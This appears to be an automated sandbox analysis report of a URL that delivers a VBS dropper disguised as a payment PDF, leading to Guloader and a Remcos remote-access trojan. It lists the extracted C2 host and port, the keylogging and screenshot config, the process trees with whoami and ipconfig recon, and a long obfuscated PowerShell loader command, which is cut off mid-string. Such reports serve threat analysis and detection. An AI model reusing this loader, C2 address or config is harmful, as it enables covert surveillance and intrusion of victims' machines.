Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13/07/2023, 21:18

General

  • Target

    http://apexdailyjournal.com/

Malware Config

Extracted

Family

remcos

Botnet

Adobe-Crusher

C2

903b6a1b4bcf0f1d44494cf445debfc6e7f166ea9a7adds.crusherx1.site:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-H0FKWE

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader, Cloudeye

    A shellcode-based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 2 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://apexdailyjournal.com/
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ff844589758,0x7ff844589768,0x7ff844589778
      2⤵
        PID:1052
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:2
        2⤵
          PID:3800
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
          2⤵
            PID:2108
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
            2⤵
              PID:4876
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2736 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
              2⤵
                PID:1768
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2744 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                2⤵
                  PID:1696
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4644 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                  2⤵
                    PID:2652
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                    2⤵
                      PID:3244
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                      2⤵
                        PID:4764
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4056 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                        2⤵
                          PID:4924
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                          2⤵
                            PID:4200
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5612 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                            2⤵
                              PID:2196
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3816 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                              2⤵
                                PID:4196
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4724 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                2⤵
                                  PID:1364
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                  2⤵
                                    PID:4616
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                    2⤵
                                      PID:1320
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                      2⤵
                                        PID:5072
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\ACH Payment_USD 3480.pdf address 2023-07-13 .vbs"
                                        2⤵
                                        • Checks computer location settings
                                        PID:2232
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c dir
                                          3⤵
                                            PID:4628
                                          • C:\Windows\System32\cmd.exe
                                            cmd /c whoami&ipconfig&echo ###RSHELL.EXE###
                                            3⤵
                                              PID:212
                                              • C:\Windows\system32\whoami.exe
                                                whoami
                                                4⤵
                                                  PID:4484
                                                • C:\Windows\system32\ipconfig.exe
                                                  ipconfig
                                                  4⤵
                                                  • Gathers network information
                                                  PID:1440
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tjen = """SFSuNnoc t i oHnA PXSyDlUoFgFrAaMfEi e 1 1U { A HpUa r aSmE( [FSTt rEi n gB]U`$AG r u nreHr iS)K;l B`$ DPuUb sDd e a dDeVs R= H' 'P;U WJrkiCt eS-SH o sAt I`$FDBu b sMdOeKa d eUsO;O WSr iHtOeP-DHGoEsAt B`$TDnu bJsMdPeVa d e s ;I FW rViTtUem-MH oAs tG f`$UDPuCbSs dSeBa dceUs ;s H I`$NL e tFdTo w n sSgP P=W NTeFwP-CO b j e c t EbSyNtde [ ]H R(Q`$IGDr u n e rLi .BLSe n g tBhB T/ 2 )b;C E P SF oKr (N`$HTUaTmGk =B0S;H D`$ T a mNkU -NlAtE T`$ GDrPuCnUeSrDiI.IL ehn gLtHh ;f A`$ TFa m kB+ = 2P)L{I b`$ PSyDrDa l i d taa p S= S' sPuFb ' +A' sItDrVipnHgP' ;B `$VEenPg lHeKl i gBeGe M=P L`$ GVrMuSn eirci . `$ P yMrLaSl iLd tFa p . IHn vOoNkEeS(B`$ TUaCm kW, 2B)S;S R U D M t`$OLVeFtAdAoswPn sbg [ `$STSa mDkA/ 2 ]B = L[Sc oNnSvRe rKtB] : :iT oSBBy tKeS( `$FEPn g l eUl iVg eCeF,B S1U6C) ;P S L`$ SMaNnHdCsIi G= (G`$ LAe t dKo wUn ssgI[ `$ TTaUmSkM/S2 ]O - bLxmo r a1U1G2 )P;S N A`$dL eFtdd oRw n s gM[ `$ITSa mDkN/ 2P]P P= S`$ S aBnFdVs iV;D T E}M W[PSst rFiMnsg ] [USUySsEtGeEmM.DTMeBxKtN.SE nFc oPdKiBnTgf]T:S:RA S CSISIT. 
GTeDt SHtDrNiNnCgW(O`$SL e tVdPo wPn sBg )P;i}U`$LT rWisa sF0k=PX ySlOoEgMrga fNi e 1E1K ' 2C3R0U9T0F3V0S4P1D5 1 D 5 EU1P4S1 CD1LCd'F;S`$KTRrTi aDsC1 = XFy l oBg r aTfSiBe 1A1S ' 3LD 1Q9d1 3P0P2 1SFG0R3S1 F 1K6 0B4S5 E 2 7A1D9 1HE 4S3C4F2R5FEP2n5r1 EF0 3C1T1 1 6P1E5 3 E 1V1M0T4l1K9B0 6K1D5U3 DT1B5 0K4B1C8C1 Fl1 4I0 3 'e;S`$FT r i a sH2 =AXAyTlAoEg r aKfFi eV1S1B ' 3B7 1P5O0F4E2S0T0S2 1BF 1B3S3S1 1I4 1V4G0 2i1 5G0B3F0P3T'T;S`$ST r iPa s 3P= XAyOlAo g r aHf ifeC1H1C F'C2 3 0S9S0 3D0 4 1 5 1PD 5 ES2B2 0D5 1 E 0U4F1J9O1nD 1 5T5iEB3 9B1 E 0 4D1 5 0 2D1KF 0B0A2S3M1 5 0L2A0 6 1 9 1T3 1M5F0 3S5SEV3 8 1H1S1RE 1C4 1 C 1u5 2 2 1 5D1 6S' ; `$ TFrBiRaTsb4O=HXUyTlAoagDr aMfViVe 1 1A ' 0A3 0I4R0B2N1 9 1mE 1 7 'I;U`$FTTr i aTsB5O=MX yHl oqgGr a fRiBeF1T1R O' 3U7 1 5K0 4S3HD 1 FH1 4B0 5 1 CA1 5F3 8C1 1 1NEM1 4 1 CF1F5C'S;V`$ T rsiAaBs 6r=TX yIlOoGgArRa f i eS1D1F o'J2 2P2p4 2S3 0T0s1 5I1D3 1 9 1 1d1 C 3 EA1 1T1ED 1G5S5 C 5M0F3H8 1M9 1B4M1B5M3 2P0O9U2A3 1B9M1 7S5 C 5 0 2R0 0A5K1A2 1AC 1f9V1 3 'K;F`$ T rAiRa sS7C= X yUlKoAg r arf i eS1 1U N' 2A2K0T5U1CE 0S4P1 9 1ODP1D5F5SC 5b0 3 DA1C1 1 EP1 1K1M7S1 5M1b4O'D; `$ATRrSiPaEsO8 =RXIyDlRoRgTroa fRiUe 1 1 M' 2H2J1N5F1S6 1SCa1f5 1A3O0d4O1N5 1C4E3H4 1S5 1SCT1B5 1G7A1 1 0C4 1G5D'E;S`$ATOrPiLaDsS9 =TX ySlFoEgLrpaSfMi e 1 1 B'M3 9N1 EB3 D 1L5 1CD 1 F 0a2F0E9R3TDT1UFA1H4B0 5A1 CS1O5E' ;M`$ AKnDsCk uDeT0 =bX y lDo gHrcaMf iHeF1 1V 'P3 DS0L9 3s4N1 5h1 C 1 5A1 7D1 1N0 4o1 5 2 4 0R9C0F0C1N5U' ;U`$ A nFs kNuSeR1 =PXSySl o g r a f i eE1P1 A'T3R3 1HC 1 1 0I3E0E3T5 CP5T0 2C0 0 5L1 2J1KCM1E9J1 3 5 C 5R0 2a3C1T5N1n1K1 Cd1B5N1S4G5HC 5 0S3o1T1 EB0C3S1k9 3S3B1OCD1V1C0 3U0L3M5 C 5R0 3 1 0M5 0M4 1 FC3C3 1lCU1f1 0 3P0 3D'H; `$ A nNsqk u e 2P=TX yEl oLg r asf iSeb1 1 A' 3 9T1 E 0H6 1MFD1SBN1 5 'R;F`$IA nnsDktu e 3 =SX y lKoIgHrGaBf iHe 1F1M 'C2S0S0 5 1O2A1 CV1M9 1a3A5HC 5d0S3 8N1 9M1A4 1G5n3 2 0B9S2S3 1b9A1A7 5TCO5 0E3 EC1p5 0 7 2T3B1EC 1LF 0 4S5DC 5 0R2P6I1I9B0 2 0 4 0 5 1F1 1 CA'M;B`$FALnPs kUuIeH4T=FXKy l oAg r a f i eF1R1E S'C2 6R1A9O0 2T0A4P0d5U1U1 1KCI3A1 1 
CM1 CL1 FA1O3 'D;I`$vAEnMsPk uNe 5 =RX yIl oRgFr a f i e 1A1I P'P1 EA0 4U1U4C1VC 1PC ' ;W`$FA n s kLuBe 6 =LXGySlIoTgRr aKf ileT1B1 'F3 E 0F4 2 0A0 2D1 Ff0P4C1 5O1 3 0 4O2 6 1U9 0f2F0F4 0S5 1B1D1 C 3DD 1 5S1CD 1 FD0E2 0T9D' ; `$FABn sSk u eG7R= X yFlEoLg r a f ime 1 1 'G3S9V3P5K2 8S'F;B`$ ASnSsYk ufe 8G= XRyrl oOg rTaAfUi et1S1 ' 2SC 'T;S`$GUKdAs pSaArSe nsd = XPyPlOo gVrsa fLiMeQ1 1V R' 2C5 2d3A3 5 2 2U4B3L4V2 'M;L`$ Hsa v eAr = XTyPlFoFgFr aAf iAeS1G1 ' 3 3T1V1S1 CL1 CS2 7S1 9w1 E 1M4 1 F 0C7 2s0c0 2 1SFC1R3R3A1G'M;BfPu nGcBtDi oDnG fOk pr b{ PAaSrBaOm R( `$ FSrIeKm ,A B`$ PPlTeUtIt eAn dAeGsC)S D B B;S`$SRTeSaalAi tE0S B= XPy lco gIrCaSfAiRe 1 1E D' 5D4S2S0U1CCR1 FE0I5B0B3D1 9 1 F 1 3S0c2D5C0U4 DK5O0 5S8R2PBB3 1E0T0E0 0 3G4 1AFE1 D 1 1M1 9S1 EW2HDK4hA 4LA 3 3 0 5o0u2 0 2 1F5S1FEU0U4 3 4S1PF 1TDC1A1 1 9L1AE 5PEC3 7P1 5 0 4 3D1a0S3S0F3I1 5 1 DR1C2 1PCK1B9 1F5e0 3k5 8 5 9C5R0 0 C 5A0N2F7 1 8U1 5 0 2B1S5 5JDG3 FS1P2 1AAS1H5 1F3 0F4Z5I0a0RB 5A0K5 4 2TFS5 E 3 7B1ACF1MFB1 2U1F1C1 C 3C1A0K3L0 3 1K5A1bD 1K2G1PCA0 9B3S3 1 1 1F3 1A8S1 5 5C0 5 D 3P1U1 E 1F4R5 0U5B4 2hF 5RE 3 Cn1 F 1F3P1a1 0 4D1 9 1 FL1BE 5WE 2B3 0R0K1RCC1P9T0Z4 5M8O5r4W3C1 1DE 0 3 1SB 0H5T1I5 4R8 5A9S2NBA5 DD4S1A2EDT5REP3 5 0s1F0 5G1P1S1SCB0b3O5v8 5A4A2 4 0 2 1M9 1p1A0 3B4 0 5D9R5 0M0SDB5D9U5HEK3H7 1U5 0N4N2H4O0 9 0P0 1 5 5B8 5L4U2A4 0 2 1 9f1o1P0F3 4b1A5J9S'S;U. 
(A`$ A n sSk uAeL7 )A `$ R e aPl i tY0 ;D`$SRAeAaSlCipt 5P = DX yUlSoFgRr aGfVi e 1 1U ' 5 4H3 4S1U5V1 D 0P9B1UER1 FD1 E 1 5 5 0L4 DT5S0 5P4T2P0N1BCT1 FU0D5Z0 3C1D9D1CF 1F3P0E2p5 EH3S7P1I5S0 4F3 Dr1 5U0 4S1 8K1FF 1M4D5 8M5 4A2B4F0 2 1B9 1 1 0N3D4P2K5SC 5I0A2BBL2D4G0 9L0H0P1 5U2 BA2 D 2 D 5 0 3 0T5 8i5 4K2 4O0 2P1 9r1D1L0 3B4 3N5CCK5T0U5 4S2 4A0 2I1 9 1 1A0A3 4 4R5v9U5O9 'K;F.F(B`$MAInFs kPuseP7 )s `$ RSeMa l iOtF5I; `$ERUe aLl i tM1T s= AXCyal oUg rMaSfAi eO1p1D A'L0V2 1 5G0N4P0 5M0S2 1 ER5C0K5E4I3 4P1 5S1TD 0E9Z1 E 1KFC1BEB1C5O5DE 3E9s1 EF0 6d1UF 1 BK1U5 5N8 5T4I1HE 0 5C1 C 1DCP5HCD5 0T3P0D5S8s2aB 2d3 0 9O0S3C0 4 1 5G1fD 5UE 2 2 0T5 1 E 0C4P1 9b1FDH1D5E5UE 3O9m1TEV0 4 1D5W0R2A1 FK0G0 2 3o1 5U0 2D0o6W1R9 1 3F1t5b0R3H5 ES3 8 1S1U1NE 1R4 1 C 1S5U2F2V1 5M1 6R2YDT5U8 3 EE1A5D0S7R5 DF3IF 1C2N1 A 1 5F1 3v0 4O5b0 2 3S0P9 0H3 0 4T1V5 1ED 5 EP2g2R0O5 1SE 0A4 1 9M1 DT1 5s5rEI3 9F1EES0 4I1p5s0 2 1EFI0 0 2O3W1P5L0 2F0 6s1B9S1 3 1 5K0N3u5RE 3E8T1 1 1PES1 4O1ACD1 5M2 2D1K5T1F6S5A8 5L8 3 E 1 5s0F7 5 DB3YFA1H2 1 A 1S5 1C3I0E4H5 0B3L9T1 EA0P4N2M0H0 4F0 2A5 9B5PCR5S0U5R8K5S4 2 0I1OCF1UFM0S5S0 3 1M9 1FF 1h3s0 2T5 E 3 7C1 5B0T4T3JDH1P5S0U4 1J8D1IFT1E4J5P8S5 4 2C4D0K2r1 9T1S1 0 3A4 5R5 9d5D9G5 E 3O9F1PE 0Z6A1BFA1RBR1J5F5 8P5A4 1GER0 5 1RCF1 CB5 CA5A0 3E0 5 8f5E4L3U6L0M2M1 5A1 D 5F9G5S9V5s9N5 9A5 CL5 0 5 4F2C0 1 CE1 5 0U4D0 4 1 5 1 E 1T4 1 5T0K3p5 9 5 9 'E; . 
(F`$ A nDs kAuTeS7E) M`$ REe aMlRidt 1 ; } f uPnMcUtOiSo n GGFDSTR A{ P aIrIaEmN B( [ PAa rFa m e tee rS( Pgo sFiCt itoNnU M= B0V,J AMSaDn dPa tFohrHy =E S`$BTKr u e ) ]T p[FTNyAp e [B]T] F`$ ZAeSl iOn eS,U[ P aNrTaWmMe tve rC( P oMs i t ibo n = 1U) ] D[GT yOp eP]I D`$AEJlFe n d i g eNsS A= N[GV oSiCd ]F) ; `$BR eFaDlSi tB2R W=A UXHyAlBo g rla fCiFeD1M1 ' 5S4 2A2D1D5 1 CF1T9P1N7 1U9 1SF 5E0L4 Dg5S0T2 B 3 1 0 0K0 0S3F4G1PFB1 Dh1 1m1I9G1lEK2ADC4gAM4KAM3t3f0 5S0R2B0 2M1 5K1HEn0 4R3 4d1PFA1 DE1U1S1P9A1 E 5 EE3F4T1L5 1 6 1 9 1UES1 5S3 4U0 9R1CEU1 1 1KD 1 9t1b3C3P1 0G3O0J3F1 5F1FDS1 2 1OC 0R9G5 8T5R8R3sEa1 5U0B7S5tDO3DF 1 2 1 AT1 5L1P3A0 4 5t0T2T3A0U9 0B3N0K4 1S5C1 Da5 E 2 2 1B5 1N6 1ICt1d5 1 3 0 4A1 9D1gF 1SER5AEL3s1S0S3S0F3E1M5P1UDW1H2A1 CP0P9D3SE 1f1T1 D 1N5T5 8 5S4I2 4 0 2M1 9F1E1S0V3 4P8R5 9 5M9r5UCS5G0 2SBO2 3 0S9 0C3U0U4H1 5N1BD 5UEA2O2S1 5W1b6S1 CK1R5D1 3 0 4P1 9D1SF 1NER5hEF3 5S1DDC1 9 0D4V5 E 3f1K0C3A0S3P1F5 1 D 1P2U1 C 0H9D3S2 0R5V1S9 1CCS1g4 1P5S0F2T3C1 1 3R1A3 1 5 0V3 0F3D2 DD4BAF4GAD2 2I0L5S1 E 5T9T5CEM3R4K1C5L1S6 1F9G1 EM1 5B3S4M0A9U1FE 1 1 1YDV1B9 1 3F3CD 1DF 1K4S0I5P1OCA1S5S5 8C5U4s2G4E0G2P1T9 1B1K0W3P4C9R5 CD5 0S5 4D1K6 1H1S1SC 0I3 1 5b5S9 5SES3T4S1N5T1 6 1M9S1 EV1K5A2 4A0S9A0P0R1U5S5 8D5L4O3O1F1 Ef0 3C1BBB0S5V1 5M4D0I5 CR5L0 5T4O3 1C1AE 0 3S1 BS0U5 1 5M4 1 5OC 5F0 2EBP2C3H0K9 0S3 0 4P1y5T1 DD5REC3LDi0S5A1TCD0B4P1N9M1 3S1 1D0P3K0 4 3E4S1 5 1KCM1M5A1 7H1A1E0Q4D1S5G2 D 5S9 'M;V.A(L`$SAUnPsSk uUeT7R) C`$ RAeFa lKiHt 2 ;O`$HRueFaClVi tB3 =h SXSyCl oMgCrSaBfLiAeO1D1T D' 5B4 2V2L1 5H1TC 1B9M1D7L1 9 1 F 5MEB3 4C1 5U1 6 1 9T1SEk1 5 3H3S1 FA1SET0 3 0 4 0C2F0 5 1K3 0 4B1 F 0T2 5S8 5O4S2T4L0L2P1A9 1M1 0 3 4K6B5 CV5 0 2SB 2 3B0S9Z0 3c0 4 1T5H1DD 5 E 2S2 1 5 1l6 1SCA1V5 1A3S0U4N1 9A1 F 1 E 5RES3 3T1 1S1 CU1IC 1B9B1 EM1 7F3 3B1OFF1 ED0O6 1 5B1TEC0L4U1R9 1MFE1EEA0s3S2 DS4 A 4SA 2 3U0 4 1B1M1cEP1 4N1H1D0D2T1A4E5SCE5 0F5L4R2WAa1W5T1 CD1 9 1 EI1 5 5 9T5 EP2C3 1 5T0S4B3H9F1UDR0 0f1FCD1d5C1 D 1B5D1 E 0 4N1 1A0 4 1N9B1PF 1FEN3 6H1 CC1 1C1 7 0 3O5T8 5S4S2R4A0S2 1 9 1M1S0W3S4 
7e5L9N' ;m.P( `$ ARn s kDu eH7G) O`$ R e a lAiJtA3D; `$MR eSabl iSt 4B = XCyPl o gVr aHf i e 1s1I G'H5R4C2S2 1A5o1CC 1N9K1U7 1A9S1NF 5FE 3F4D1S5S1M6o1C9 1PE 1E5 3 D 1R5S0 4 1W8I1 F 1 4 5k8P5S4U3S1 1KE 0P3 1 BM0M5S1S5S4 2H5 CF5T0K5 4H3B1K1 EV0 3S1SB 0 5P1 5W4 3 5 CU5 0V5b4E3H5P1PCG1 5 1GEt1G4P1 9 1S7C1 5 0M3D5SCG5M0U5 4F2HAP1E5H1SC 1T9 1SEL1 5 5G9U5bET2R3m1 5 0 4F3 9 1ED 0P0 1 CD1K5K1 Dr1K5M1 EV0 4 1A1 0 4r1 9A1SFE1 E 3 6 1 C 1 1 1T7H0 3T5P8T5U4P2 4D0 2r1S9D1C1G0 3P4A7M5 9 'B; .J( `$LAFnRs k uTeN7B)I K`$ R eDa lUi t 4 ;K`$SRFe aTlMiAt 5I N=N RXHy lPoRgLrCaKfDiSeH1 1 p'S0S2K1 5R0 4 0a5 0A2B1 E 5D0 5T4T2C2p1J5 1 CH1 9 1V7 1O9i1 F 5DE 3 3 0 2 1R5 1 1 0 4 1V5U2N4S0 9 0 0I1S5A5P8G5 9N' ; .S(O`$ ANnOs kBuTe 7K) `$ RDeSa lEi tP5M M; } `$BS k y lSi t n eBos I= GXLyblDoBg rRaTf i e 1a1 'K1MBH1P5 0I2T1LE 1 5 1sC 4Y3 4G2K' ;R`$SXFyFlAo g rGaRf iue 0M3t D=E SXSyMlBoLgUrBaKfAi e 1 1s 'T3 7S1 5P0U4 3 3 1 FC1lEF0F3 1VFK1pCH1G5B2n7U1 9 1 EA1 4R1MFV0M7S'F; `$ XMyPl oEgVrKaBfSiPeS0 0B=MX yRlDo g rIaNf i eb1C1P ' 2 3 1A8s1 FB0S7 2P7 1 9J1MEC1a4 1FF 0P7 ' ; `$PX yAlSo gPrGa fSizeG0D1R E= HX ySlfo gTriaUf iSe 1 1 F'a5B4H3 6R1 5C0 2 0 6B1 9 1 4f5S0 4 D 5K0B2UB 2a3S0A9 0 3 0 4 1S5s1 DE5UE 2C2 0B5B1FEt0B4F1D9F1SD 1D5B5SE 3 9K1 E 0 4U1K5 0I2a1HFU0F0E2A3L1S5 0I2 0X6 1c9 1 3 1S5B0H3 5 ET3 DP1 1 0E2 0b3s1T8 1H1P1 CV2 D 4RA 4kAN3V7D1u5S0G4 3 4 1 5C1 CB1 5 1T7 1Q1 0L4 1V5 3 6 1 F 0L2V3P6m0 5H1SE 1 3D0E4p1S9R1 FB1 E 2 0 1 FB1 9A1OED0S4 1U5 0O2A5H8 5O8N1D6 1SB 0 0 5 0i5 4 2A5S1 4U0E3M0N0O1 1 0 2A1s5S1RE 1 4B5F0 5S4 2V8J0 9 1UCB1 F 1R7 0 2H1M1S1 6c1C9F1C5P4S0K4O0b5J9 5 Cc5K0S5 8T3S7 3 4K2O4 5 0E3 0U5P8T2LB 3 9D1PEU0 4H2 0j0C4 0F2H2SD 5GCV5M0C2 BB2C5B3W9U1NED0K4 4B3A4M2 2PDG5 9C5 0S5S8T2 BS3I9v1 EF0D4A2U0N0 4U0G2M2SD 5H9 5T9 5 9 ' ;F.S( `$uASnCs kEu e 7M)S `$ XCyTlBo gBr aGf i eJ0B1B;A`$LXUyTl oAg rSaDfIi e 0 2S =B X y l o gBr a fDiCe 1I1L S' 5 4A2F6 1U5 1I4c1TB 1M5p5 0F4SD 5U0C2 B 2 3D0 9 0I3V0O4 1N5I1 DG5CEF2E2F0E5H1SE 0 4 1T9T1RD 1 5F5 E 3A9t1 E 0 4R1 5F0 2R1KF 0K0S2A3 1G5H0s2 0U6 1G9M1r3 1D5R0 
